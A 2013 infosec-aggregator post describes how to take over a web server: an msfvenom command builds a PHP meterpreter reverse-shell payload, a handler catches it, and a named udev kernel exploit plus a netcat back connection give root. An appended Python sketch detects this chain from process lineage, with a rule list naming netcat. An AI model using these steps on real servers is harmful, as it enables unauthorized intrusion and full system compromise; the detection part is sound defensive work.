Kwelwild, posted March 11, 2013

Description: Hey my friends, today I made a small tutorial on rooting a web server using Metasploit. I hope you know how to create Metasploit backdoor executables. Here we use the same theory, but our payload is php/meterpreter_reverse_tcp. As we need a back connection to our PC, we use a reverse connection. So the parameters should be like this:

msfvenom -p php/meterpreter_reverse_tcp LHOST=[local IP] LPORT=[Local Port] -f raw

We need a raw output, so we use the format raw. Now our PHP meterpreter reverse connection is created, but you have to delete the '#' character at line 1 to run this script correctly.

Okay, now run msfconsole and use exploit/multi/handler with the LHOST and LPORT and exploit. Here in this video I have used msfcli, which is the same but has the advanced automation features of Metasploit. By now our framework should start listening. Next, upload our PHP script to the server and load it.

Yeah, you should get a successful meterpreter session opened. We cannot use all the meterpreter commands as our payload is in PHP, hence we have limited meterpreter commands. Now run shell and there you go.

As usual, the normal procedure of compiling a local root exploit and executing it can be done here. But in this example my kernel is 2.6.24-16, so I will use the Linux 2.6 Udev Local Privilege Escalation Exploit (Linux Kernel 2.6 UDEV < 141 Local Privilege Escalation Exploit). We should run this exploit like this:

./exploit PID of Udev-1

Next, after successful exploitation, our payload in /tmp/run will be executed as root, so in this case I will be using a simple netcat back connection as my payload. That is it, just listen using NC and you should get a successful back connection and you are the root.

Un0wn_X
Thank You.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source: Rooting A Server Using Metasploit Back Connection
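Seen from the defending side, the chain described in the post leaves a recognisable process lineage: a web server worker spawning a shell, a compiler run beneath it, a root process executing from /tmp, and netcat under that. The Python sketch below is an added example, not part of the original post or video; the event records, field names and rule names are constructed for illustration, and it assumes process-creation telemetry (for instance from auditd) is being collected.

```python
import os

# Constructed process-creation events (e.g. distilled from auditd execve
# records); every pid, uid and path here is sample data, not from the post.
EVENTS = [
    {"pid": 900, "ppid": 1, "uid": 0, "exe": "/usr/sbin/apache2"},
    {"pid": 1200, "ppid": 900, "uid": 33, "exe": "/usr/sbin/apache2"},
    {"pid": 1310, "ppid": 1200, "uid": 33, "exe": "/bin/sh"},
    {"pid": 1322, "ppid": 1310, "uid": 33, "exe": "/usr/bin/gcc"},
    {"pid": 450, "ppid": 1, "uid": 0, "exe": "/sbin/udevd"},
    {"pid": 1400, "ppid": 450, "uid": 0, "exe": "/tmp/run"},
    {"pid": 1401, "ppid": 1400, "uid": 0, "exe": "/bin/nc"},
    {"pid": 2000, "ppid": 1, "uid": 0, "exe": "/usr/sbin/cron"},
    {"pid": 2001, "ppid": 2000, "uid": 0, "exe": "/bin/sh"},  # benign cron job
]

WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm", "php-cgi"}
SHELLS = {"sh", "bash", "dash"}
COMPILERS = {"gcc", "cc", "make"}
NETCATS = {"nc", "ncat", "netcat"}
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def ancestors(pid, by_pid):
    """Yield the parent, grandparent, ... of pid that are present in by_pid."""
    seen, ev = set(), by_pid.get(pid)
    while ev and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        yield ev

def detect(events):
    """Return (rule, pid) alerts for the lineage patterns in the walkthrough."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = os.path.basename(e["exe"])
        chain = list(ancestors(e["pid"], by_pid))
        if name in SHELLS and any(os.path.basename(a["exe"]) in WEB_SERVERS for a in chain[:1]):
            alerts.append(("web-server-spawned-shell", e["pid"]))
        if name in COMPILERS and any(os.path.basename(a["exe"]) in WEB_SERVERS for a in chain):
            alerts.append(("compiler-under-web-server", e["pid"]))
        if e["uid"] == 0 and e["exe"].startswith(WRITABLE_DIRS):
            alerts.append(("root-exec-from-writable-dir", e["pid"]))
        if name in NETCATS and any(a["exe"].startswith(WRITABLE_DIRS) for a in chain):
            alerts.append(("netcat-under-writable-dir-binary", e["pid"]))
    return alerts

if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

The cron-spawned shell in the sample data is deliberately left unflagged, since the rules key on lineage rather than on the binary name alone.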